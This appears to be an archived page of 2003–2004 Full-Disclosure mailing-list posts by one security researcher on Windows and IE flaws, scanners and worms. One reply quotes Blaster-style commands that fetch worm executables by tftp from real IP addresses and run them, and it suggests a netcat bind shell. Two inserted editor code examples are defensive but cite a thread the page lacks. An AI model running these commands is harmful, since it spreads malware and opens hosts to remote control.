  Dunno but your message crashes OE on (pre)view.
  no warning, no nothin... OE just *bink* closes
  NICE JOB [EMAIL PROTECTED] 
  

Symptoms were reported using the following:

Windows XP Pro ( Gold SP0 )
OE Version = 6.00.2600.(xpclient 010817-1148)

dll's not matching version sig:

csapi3t1.dll unknown
mshtml.dll6.00.2734.1600
msoe.dll  6.00.2720.3000
msoeacct.dll6.00.2800.1123
msoert2.dll  6.00.2800.1123
ole32.dll  5.1.2600.115(xpclient_qfe.021108-2107
riched20.dll  5.30.23.1210
riched32.dll  5.1.2600.0(xpclient 010817-1148)
wab32.dll unknown
wab32res.dll unknown


note: I was forced to go to hotmail via the web interface,
 and manually delete the message to restore function. 

further, my Security tab in options is set to Internet Zone
( less secure ) on the account in question.

 One more note of observance in OE6, each account can be independently
set for security zones even in a single user machine. I now check
security settings on every account per machine ( not user login ) , 
however I have not noted if the settings are inherited from the current
IE security settings at the time of account creation ( but would explain
my different settings across 6 accounts on a single user box ).


Donnie Werner
http://exploitlabs.com



Re: [Full-Disclosure] Re: HelpCtr - allow open any page or run

2004-02-13 Thread morning_wood

 win2k sp4
 
 does not work 
 
Help Center only ships with Me, XP and Win2k3

btw..  UNCONFIRMED in Xp Pro Sp0




m.wood



Re: [Full-Disclosure] RE: W2K source leaked?

2004-02-13 Thread morning_wood
it has been leaked , also for the winnt 4 and the windows XP sourcecode

files like : windows.2000.source.code-IND are now roaming irc channels and
webpages ... it is a hard day for microsoft i guess 
 
 I have seen these files... personally I find it hard to believe the NT / 2k base
is bigger than a 200mb zip. What it does look like is a core subset of some
parts of windows with sources. I can bet that what is in the release was
heavily audited and not really a loss in anyone's book.

my2bits

Donnie Werner
[EMAIL PROTECTED]
http://exploitlabs.com 




[Full-Disclosure] Funny, I thought I mailed FULL DISCLOSURE

2004-02-12 Thread morning_wood

- Original Message -
From: Lyris ListManager [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, February 11, 2004 5:49 PM
Subject: Message rejected
 Return-Path: [EMAIL PROTECTED]
 Received: from smarthost3.mail.uk.easynet.net ([212.135.6.13]) by
listserv.patchmanagement.org with SMTP (Lyris ListManager WIN32 version 7.8b);
Wed, 11 Feb 2004 20:49:06 -0500
 Received: from spirahellicmultimedia-11.dsl.easynet.co.uk ([212.135.176.251]
helo=spirasecondary.spirainternal.co.uk)
 by smarthost3.mail.uk.easynet.net with esmtp (Exim 4.10)
 id 1Ar5uh-0005g3-00
 for [EMAIL PROTECTED]; Thu, 12 Feb 2004 01:45:11
+
 Received: from spiramain.spirainternal.co.uk ([10.0.0.150])
   by spirasecondary.spirainternal.co.uk (Lotus Domino Release 5.0.8)
   with ESMTP id 2004021201445193:5736 ;
   Thu, 12 Feb 2004 01:44:51 +
 Received: from mail pickup service by spiramain.spirainternal.co.uk with
Microsoft SMTPSVC;
 Thu, 12 Feb 2004 01:45:09 +
 Delivered-To: spirah-spira:co:[EMAIL PROTECTED]
 X-Envelope-To: [EMAIL PROTECTED]
 Received: (qmail 75370 invoked from network); 12 Feb 2004 01:40:24 -
 Received: from outgoing2.securityfocus.com (205.206.231.26)
   by raitax.pair.com with SMTP; 12 Feb 2004 01:40:24 -
 Received: from lists2.securityfocus.com (lists2.securityfocus.com
[205.206.231.20])
 by outgoing2.securityfocus.com (Postfix) with QMQP
 id 51E2B9113D; Wed, 11 Feb 2004 07:54:59 -0700 (MST)
 Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
 Precedence: bulk
 List-Id: bugtraq.list-id.securityfocus.com
 List-Post: mailto:[EMAIL PROTECTED]
 List-Help: mailto:[EMAIL PROTECTED]
 List-Unsubscribe: mailto:[EMAIL PROTECTED]
 List-Subscribe: mailto:[EMAIL PROTECTED]
 Delivered-To: mailing list [EMAIL PROTECTED]
 Delivered-To: moderator for [EMAIL PROTECTED]
 Received: (qmail 14774 invoked from network); 10 Feb 2004 22:07:52 -
 X-Originating-IP: [4.65.224.219]
 X-Originating-Email: [EMAIL PROTECTED]
 X-Sender: [EMAIL PROTECTED]
 From: morning_wood [EMAIL PROTECTED]
 To: [EMAIL PROTECTED], [EMAIL PROTECTED],
 [EMAIL PROTECTED],
 [EMAIL PROTECTED]
 References: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Another Low Blow From Microsoft: MBSA Failure!
 Date: Tue, 10 Feb 2004 20:14:08 -0800
 MIME-Version: 1.0
 X-Priority: 3 (Normal)
 X-MSMail-Priority: Normal
 X-Mailer: Microsoft Outlook Express 6.00.2720.3000
 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2727.1300
 Message-ID: [EMAIL PROTECTED]
 X-OriginalArrivalTime: 11 Feb 2004 04:14:53.0320 (UTC)
FILETIME=[99693080:01C3F055]
 X-MIMETrack: Itemize by SMTP Server on spirasecondary/SpiraHellic(Release
5.0.8 |June 18, 2001) at
  02/12/2004 01:44:51 AM,
 Serialize by Router on spirasecondary/SpiraHellic(Release 5.0.8 |June 18,
2001) at
  02/12/2004 01:44:52 AM,
 Serialize complete at 02/12/2004 01:44:52 AM
 Content-Transfer-Encoding: 7bit
 Content-Type: text/plain;
 charset=iso-8859-1



Re: [Full-Disclosure] ms04-007 Scan tool?

2004-02-11 Thread morning_wood

 Does anyone know of a vulnerability scanner yet? I found a nessus plugin
 but all it does is check the registry for the existence of the patch.
 
 Thanks,
 
 Jeff
 


try looking for open port 3127

or even open up a netcat ( thanks Hobbit ) listener
nc -L -n -v -p 3127

also do the same for RPC-DCOM aka msblaster

here's a sample...

tftp -i 4.65.168.122 GET msblast.exe
start msblast.exe
msblast.exe

tftp -i 4.65.174.100 GET mslaugh.exe
start mslaugh.exe
mslaugh.exe

tftp -i 192.168.1.12 GET teekids.exe
start teekids.exe
teekids.exe

tftp -i 4.65.194.212 GET enbiei.exe 
start enbiei.exe 
enbiei.exe 

.. yes there are 4 variants.

to get infected ( capture one ) try netcat with the -e

to call cmd.com listening on port  as well... fun trick.

morning_wood
http://exploitlabs.com 
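Added example for the `nc -L` capture discussed in the mydoom.c thread earlier on this page and the port-3127 listener suggested above (editor's code, not from the posts and not netcat): a listener that re-accepts after each peer disconnects, returns what every peer sent, and files the captures separately. The loopback demo, port choice and payloads are constructed; nothing here connects out.

```python
import os
import socket
import threading
from typing import List


def capture_connections(server: socket.socket, max_connections: int,
                        timeout: float = 5.0) -> List[bytes]:
    """Accept peers one after another (what `nc -L` adds over `nc -l`: re-listen after
    each peer closes) and return the bytes each one sent, in order."""
    captured = []
    server.settimeout(timeout)
    for _ in range(max_connections):
        try:
            conn, _peer = server.accept()
        except socket.timeout:
            break                         # nobody connected in time; stop listening
        chunks = []
        with conn:
            conn.settimeout(timeout)
            while True:
                try:
                    data = conn.recv(4096)
                except socket.timeout:
                    break                 # peer went quiet; keep what we have
                if not data:              # peer closed: that transfer is complete
                    break
                chunks.append(data)
        captured.append(b"".join(chunks))
    return captured


def save_captures(captures: List[bytes], directory: str, prefix: str = "capture") -> List[str]:
    """Write each payload to its own numbered file, so transfers never overwrite each other."""
    paths = []
    for i, payload in enumerate(captures, 1):
        path = os.path.join(directory, "%s.%03d.bin" % (prefix, i))
        with open(path, "wb") as f:
            f.write(payload)
        paths.append(path)
    return paths


def demo(payloads: List[bytes]) -> List[bytes]:
    """Constructed loopback run: start the listener on an ephemeral port, then play the
    role of several peers in turn, each sending one payload and disconnecting."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(5)
    port = server.getsockname()[1]
    results: List[bytes] = []
    worker = threading.Thread(
        target=lambda: results.extend(capture_connections(server, len(payloads))))
    worker.start()
    try:
        for payload in payloads:
            with socket.create_connection(("127.0.0.1", port)) as peer:
                peer.sendall(payload)
        worker.join()
    finally:
        server.close()
    return results


if __name__ == "__main__":
    import tempfile
    got = demo([b"first peer payload", b"second peer payload"])
    with tempfile.TemporaryDirectory() as d:
        print(save_captures(got, d))
```

Whatever is captured this way is untrusted input: keep it on a box you do not care about, never execute it, and hash each file before it goes anywhere else.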







[Full-Disclosure] FD foobar?

2004-02-10 Thread morning_wood
feb - 2006 ???
feb - 2005 ???

http://lists.netsys.com/pipermail/full-disclosure/
sorted by date.


The Full-Disclosure Archives
You can get more information about this list or you can download the full raw
archive ( 92 MB ).
ArchiveView by:Downloadable version
2006-February:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Text 1 KB ]
2005-February:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 500
bytes ]
2004-October:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 677
bytes ]
2004-February:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 507 KB ]
2004-January:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 1 MB ]
2003-December:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 1 MB ]
2003-November:[ Thread ] [ Subject ] [ Author ] [ Date ] [ Gzip'd Text 1 MB ]

there is at least one post in the bad years that I did not receive via normal
list email,
and i thought this might have something to do with it.
any others experience this?

m.wood



Re: [Full-Disclosure] Another Low Blow From Microsoft: MBSA Failure!

2004-02-10 Thread morning_wood
 been applied. We have scanned with Retina, Foundstone and Qualys tools
 which they all showed as VULNERABLE, however when we scanned with Microsoft
 Base Security Analyzer it showed as NOT VULNERABLE. This was at first
 confusing; one would think an assessment tool released by the original

did you try exploit code to verify? that should dispel any ambiguity
across scanner reports, it would be real easy to load your network
hosts into a batch file or shell script and see how many roots you get.

just a thought... eliminates a lot of guesswork.. ( imo )

m.wood
http://exploitlabs.com



Re: [Full-Disclosure] Virus infect on single user

2004-02-09 Thread morning_wood
 I noticed that the file was last modified a day that i didn't open my pc. Is
there any change for that file to have attributes than the real one?

not uncommon for date manipulation with trojans. Beast 2.05 uses activeX
startup routines and file date manipulation of the files ( files are dated
8/23/2001 ).


Donnie Werner
[EMAIL PROTECTED]
http://exploitlabs.com



[Full-Disclosure] * in url

2004-01-13 Thread morning_wood
dunno if this is new but..

http://pa.yahoo.com/*http://rd.yahoo.com/hotjbs/*http://example.com


m.wood 
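Added example for the `*`-chained redirector URL above (editor's code, not from the post and not Yahoo's redirector): splitting the chain into hops and validating every hop against a host allow-list, which is what stops a link that starts on a trusted host from delivering the browser somewhere else. The allow-list is an assumption; the URL is the one in the post.

```python
from typing import Iterable, List, Optional
from urllib.parse import urlsplit

# Assumption: the hosts whose redirectors the site considers its own.
ALLOWED_HOSTS = {"pa.yahoo.com", "rd.yahoo.com"}


def redirect_hops(url: str) -> List[str]:
    """Split a '*'-chained redirector URL into hops: the URL as requested first, then
    each destination the previous hop hands to the browser."""
    return url.split("*")


def host_allowed(target: str, allowed: Iterable[str]) -> bool:
    """Accept a relative path or an http(s) URL whose host is on the allow-list.
    Scheme-relative targets (//evil) parse with a netloc and are caught the same way."""
    parts = urlsplit(target)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False
    if parts.netloc:
        return parts.netloc.lower() in {h.lower() for h in allowed}
    return True


def safe_redirect_target(target: str, allowed: Iterable[str], default: str = "/") -> str:
    """Server-side guard for a `goto=`-style parameter: off-site targets fall back to default."""
    return target if host_allowed(target, allowed) else default


def resolve_chain(url: str, allowed: Iterable[str]) -> Optional[str]:
    """Walk every hop of a chained redirect and return the final destination only if
    each hop stays on an allowed host; otherwise None (refuse the redirect)."""
    hops = redirect_hops(url)
    for hop in hops:
        if not host_allowed(hop, allowed):
            return None
    return hops[-1]


# The chained URL from the post.
CHAIN = "http://pa.yahoo.com/*http://rd.yahoo.com/hotjbs/*http://example.com"

if __name__ == "__main__":
    print(redirect_hops(CHAIN))
    print(resolve_chain(CHAIN, ALLOWED_HOSTS))
    print(safe_redirect_target("//example.com/x", ALLOWED_HOSTS))
```

Checking only the first hop is the mistake an open redirector makes: the link looks like it goes to the trusted host, and it does, but that host then forwards wherever the tail of the URL says.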



Re: [Full-Disclosure] Alleged IT security extortion plot against BestBuy.com

2004-01-07 Thread morning_wood
  http://www.startribune.com/stories/535/4304797.html
 

in re-reading this article i was presented with
 an offer to subscribe/signup/register to the StarTribune
 when re-clicking on the above link. The redirected url is
http://24hour.startribune.com/login/?goto=http://www.startribune.com/stories/535/4304797.html

To access startribune.com content and features, you must be a registered
member.
Becoming a registered member is fast and FREE. Just fill out the following
information and you'll have access to all startribune.com offers, including
content, features, newsletters, contests, special offers and Talk. Let's get
started.


Deleting the cookie restores the link to the article without the signup.
cookie: [EMAIL PROTECTED]


m.wood



[Full-Disclosure] OnStar backdoor in your car...

2004-01-06 Thread morning_wood
The FBI and other police agencies may not eavesdrop on conversations inside
automobiles equipped with OnStar or similar dashboard computing systems...
 http://news.com.com/2100-1029_3-5109435.html


uhhh...
Big brother is now

m. wood
http://exploitlabs.com



Re: [Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV

2004-01-02 Thread morning_wood
 On Thu, 1 Jan 2004 22:41:35 - [EMAIL PROTECTED] wrote:
 [snip]
  Fully self-contained harmless *.exe:
 
  http://www.malware.com/exe-cute-html.zip
 [snip]

 This doesn't look like self-executing HTML - anyway.


Gives a dialog box to open or save a blabla.hta and no, it does not self-execute
even under low security settings. Try again Jelmer?


morning_wood
http://exploitlabs.com



Re: [Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV

2004-01-02 Thread morning_wood
 Your post isn't very informative
 what kind of system did you test it on? It worked on my fully patched
 Windows XP


WinXP SP0 / IE6 010817-1148

running http://microsoft.bbs.us/malware.html; i get only a webpage with junkware
and no file(s) on my hd.

running malware.html locally does produce the desired results, but then again...
i can get any html to execute locally calling a remote location for the code, as
long as it's run from the local machine.

m.w00d



Re: [Full-Disclosure] WinME firewalling

2003-11-09 Thread morning_wood
Actually winMe is quite safe out of the box (it's win9x) and
does not have the remote compromises that affect winXP / win2k

Donnie Werner
E2 Labs
 
- Original Message - 
From: j [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Monday, November 10, 2003 6:33 AM
Subject: [Full-Disclosure] WinME firewalling


 I'm interested in opinions from list participants - all my work is with
 linux, like a firewalling linux bridge on a win/lin mixed network.
 
 Given:  A technologically-impaired grandmother with winME.  Any change
 of OS would be psychologically damaging... (WinXP 'kindergarten crayon'
 default theme would probably induce seizures... ;^)  Grandma now gets a
 DSL connection, and as per the ISP has this shiny new DSL modem plugged
 into said WinME machine, both now powered up ~24 hours per day, an open
 orifice with a target painted on it.
 
 What software firewall solution is truly suitable for Grandma?  As
 invisible to the user as possible, of course, since this Grandma doesn't
 understand most of the 'little window thingies' that spontaneously
 appear already.  (you know at least one - the manic 'ok' clicker...) 
 Additional hardware of any kind is not permitted, this has to be a
 software solution under WinME.
 
 Clearly there are 'social' factors in training such a user - I'm looking
 for opinions regarding the software end of things, not 'whack her in the
 head every time she clicks OK without reading' suggestions.  :^)
 
 Thanks.
 
 j
 
 ---
 
 MCP  -  Defenestrator  -  Cynic
 
 
 



Re: [Full-Disclosure] WinME firewalling

2003-11-09 Thread morning_wood
yes, excuse *cough* my not mentioning the IE vulnerabilities,
... details... details.
Comparatively, putting a win9x based box on an open
internet connection, without browsing in Internet Explorer,
is safer than a win XP / 2K box (as we saw without even
logging in as i had pointed out, just before LSD release of RPC
exploit code) on the same connection.

So go buy grandma winME, and update to the latest non IE or
patched IE 6, no fancy-smanshy firewall or setup pains needed
oh and set her Outlook Express to disable HTML to view mail.
and no Kazaa (p2p) or the elderly's favorite, Bonzi Buddy (but mr
technician... he talks to me) for crying out loud


Donnie Werner
[EMAIL PROTECTED]



- Original Message - 
From: [EMAIL PROTECTED]
To: morning_wood [EMAIL PROTECTED]
Cc: j [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Monday, November 10, 2003 8:44 AM
Subject: Re: [Full-Disclosure] WinME firewalling 



Re: [Full-Disclosure] IE object vulnerability

2003-11-05 Thread morning_wood
ever try google?
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=eeye+object&btnG=Google+Search

morning_wood


- Original Message - 
From: Ahmad Naazir [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, November 05, 2003 2:06 PM
Subject: [Full-Disclosure] IE object vulnerability


 hey actually I want the code of the file
 http://morningwood.ethicsdesign.com/fucked4test.asp
 can anyone give it to me





Re: [Full-Disclosure] IE object vuln

2003-11-04 Thread morning_wood
it is a demo of the object tag exploit code, ASP is server side script that
does not render in the browser, that is why you can't see it.

morning_wood


- Original Message - 
From: Ahmad Naazir [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, November 04, 2003 3:09 PM
Subject: [Full-Disclosure] IE object vuln


 Can anyone tell me about IE object vuln
 what kind of asp file is used
 morningwood.ethicsdesign.com/cmd.asp
 
 
